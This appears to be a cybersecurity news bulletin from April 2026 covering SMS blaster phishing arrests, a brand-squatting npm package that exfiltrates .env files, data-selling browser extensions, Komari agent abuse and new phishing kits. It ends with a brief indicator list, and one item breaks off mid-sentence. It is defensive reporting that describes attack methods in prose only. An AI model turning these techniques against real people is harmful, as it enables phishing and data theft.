ThreatsDay Bulletin: SMS Blaster Busts, OpenEMR Flaws, 600K Roblox Hacks and 25 More Stories

Summary

A comprehensive threat briefing highlighting multiple security incidents: Canadian authorities arrested three men operating SMS blasters mimicking cell towers for phishing; a malicious npm package impersonated TanStack to steal environment variables from developers; 80 browser extensions openly resell data from 6.5M+ users; and threat actors abused the Komari agent tool in real-world intrusions using stolen VPN credentials.

Full text

ThreatsDay Bulletin: SMS Blaster Busts, OpenEMR Flaws, 600K Roblox Hacks and 25 More Stories Ravie LakshmananApr 30, 2026Hacking News / Cybersecurity News The internet is noisy this week. We are seeing some wild new tactics, like people using fake cell towers to send scam texts, while some developers are accidentally downloading tools that peek into their private files during a simple install. It is definitely a busy time to be online. Security is always a moving target. Millions of servers are currently sitting online without any passwords, and old software bugs are showing up in the most unexpected places. Even with the right fixes available, staying one step ahead is a full-time job for all of us. Data is shifting in strange ways, too. Some browser tools are now legally selling user history for profit, and new kits are making it simpler for almost anyone to launch a campaign. You have to see these latest updates to believe them. Let’s look at the full list... SMS blaster phishing crackdown Canadian Authorities Arrest 3 Men for Alleged Use of SMS Blaster Canadian authorities have arrested three men for operating an SMS blaster device that masquerades as a cellular tower to send phishing texts to nearby phones. These tools trick devices into connecting to them by emitting signals that mimic a legitimate tower. "An SMS blaster works by mimicking a legitimate cellular tower. When nearby phones connect to it, users receive fraudulent text messages that appear to come from trusted organizations," authorities said. "These messages often prompt recipients to click on links that lead to fake websites designed to capture personal information, including banking credentials and passwords." The three men are facing 44 charges in connection with the crime. About tens of thousands of devices were connected to the blaster over several months, the official said. This is the first time that an SMS blaster has been spotted in the country. npm brandsquat data theft npm Package Brand-Squats TanStack to Exfiltrate Environment Variables A new supply chain attack has leveraged an npm package impersonating TanStack to ship malicious versions that exfiltrate environment variables from developers’ machines during install. The package, named tanstack, is designed to "silently steal environment variable files, including .env, .env.local, and .env.production, from developers' machines at install time, exfiltrating them to an attacker-controlled endpoint," Socket said. The malicious package is maintained by a user named "sh20raj." Versions 2.0.4 through 2.0.7 are confirmed malicious. Update: In a post shared on X, Shaswat Raj (@SH20RAJ), the developer behind the package, apologized for his actions and claimed he demanded $10,000 from Tanner Linsley, creator of TanStack, as he "thought it was acceptable to ask for a bounty" for returning the name. The developer also stated the malicious code was part of "random testing" for jailbreaking Google Antigravity." Extensions legally sell user data Extension Developers Sell Data of At Least 6.5M Users In a new analysis, LayerX found that multiple networks of browser extensions collect user data and resell it for profit. Unlike malicious extensions that conceal their behavior by offering some harmless functionality, the identified 80 extensions explicitly inform users in their privacy policy that they collect and sell data of users who install their extensions. "A network of 24 media extensions that are installed on 800,000 users and collect viewing data and demographic information on major streaming platforms such as Netflix, Hulu, Disney+, Amazon Prime Video, HBO, Apple TV, and others," LayerX said. "12 separate ad blockers with a combined install base of over 5.5 million users openly selling user data. Nearly 50 other extensions, with over 100,000 users in aggregate, that collected and resold users’ browsing data." Komari tool weaponized in attacks First Recorded Abuse of Komari Agent Huntress has revealed that unknown threat actors used stolen VPN credentials to pivot into a Windows workstation belonging to an unspecified organization via Impacket's smbexec.py, and dropped a SYSTEM-level backdoor using the Komari agent, a Go-based remote-control, monitoring, and management tool. The development marks the first publicly documented case of the tool being abused in a real-world intrusion. It also illustrates how bad actors are increasingly switching to publicly available and legitimate tools to conduct attacks. "Komari is not a telemetry tool that happens to be abusable - it is a bidirectional control channel by design. The agent opens a persistent WebSocket to its server and accepts three server-to-agent event types out of the box: exec (arbitrary command execution via PowerShell / sh), terminal (interactive PTY reverse shell in the operator's browser), and ping (ICMP / TCP / HTTP probing)," Huntress said. "All three are enabled by default." Whereas other tools like Velociraptor and SimpleHelp that have been abused by threat actors typically act as means to an end, Komari gives an operator arbitrary command execution, an interactive PTY reverse shell, and network probing by default, over a TLS-fronted WebSocket. Next-gen phishing kits escalate New Saiga 2FA and Phoenix System Phishing Kits Spotted Threat actors have detailed two new phishing kits named Saiga 2FA and Phoenix System that have been linked to emails and SMS phishing attacks. According to Barracuda, Saiga 2FA goes beyond traditional adversary-in-the-middle (AitM) features by integrating tools like FM Scanner for extracting and analyzing mailbox content. "Saiga 2FA is an example of how phishing kits are evolving into application-level platforms," the company said. "Unlike traditional phishing kits, Saiga integrates infrastructure, automation, and post-compromise capabilities into a unified system, supporting advanced and highly targeted campaigns." Phoenix System, on the other hand, has been tied to over 2,500 phishing domains since January 2025, while relying on IP-based filtering and geofencing for precision targeting. It's assessed to be the successor to the now-defunct Mouse System. "The campaigns are delivered via SMS, potentially leveraging fake Base Transceiver Stations (BTS) to bypass carrier-level filtering and allow threat actors to send messages that appear under the brand names of trusted organizations directly to victims," Group-IB said. "The campaign has so far targeted more than 70 organizations across the financial services, telecommunications, and logistics sectors globally." Mass exposure of remote access servers Exposed RDP and VNC Servers Found A new analysis from Forescout has found 1.8 million RDP and 1.6 million VNC servers are exposed on the internet. "China accounts for 22% of exposed RDP and 70% of exposed VNC servers; the U.S. accounts for 20% and 7%; Germany accounts for 8% and 2%," the company said. "Of 91,000 RDP and 29,000 VNC servers mapped to specific industries, retail, services, and education lead RDP exposure; education, services, and healthcare lead VNC." What's more, 18% of exposed RDP servers run end-of-life Windows versions, more than 19,000 RDP servers remain vulnerable to BlueKeep (CVE-2019-0708), and nearly 60,000 VNC servers have authentication disabled. To make matters worse, more than 670 exposed VNC servers have authentication disabled and provide direct access to OT/ICS control panels. China-linked influence op falters Spamouflage Attempts to Influence Tibetan Parliament-in-Exile Elections A China-linked online influence campaign attempted to undermine April 26 elections for the Tibetan parliament-in-exile with little impact. The operation, part of Spamouflage, a long-running influence network linked to Beijing, has used a cluster of 90 Facebook profiles and 13 Instagram profiles to push criticism of the Tibetan government-in-exile and its leadership. "The network tries to drive wedges within the community," DFRLab said. "T

Indicators of Compromise

• malware — SMS blaster
• malware — Komari agent
• malware — Saiga 2FA
• malware — Phoenix System
• malware — tanstack npm package (versions 2.0.4-2.0.7)

Entities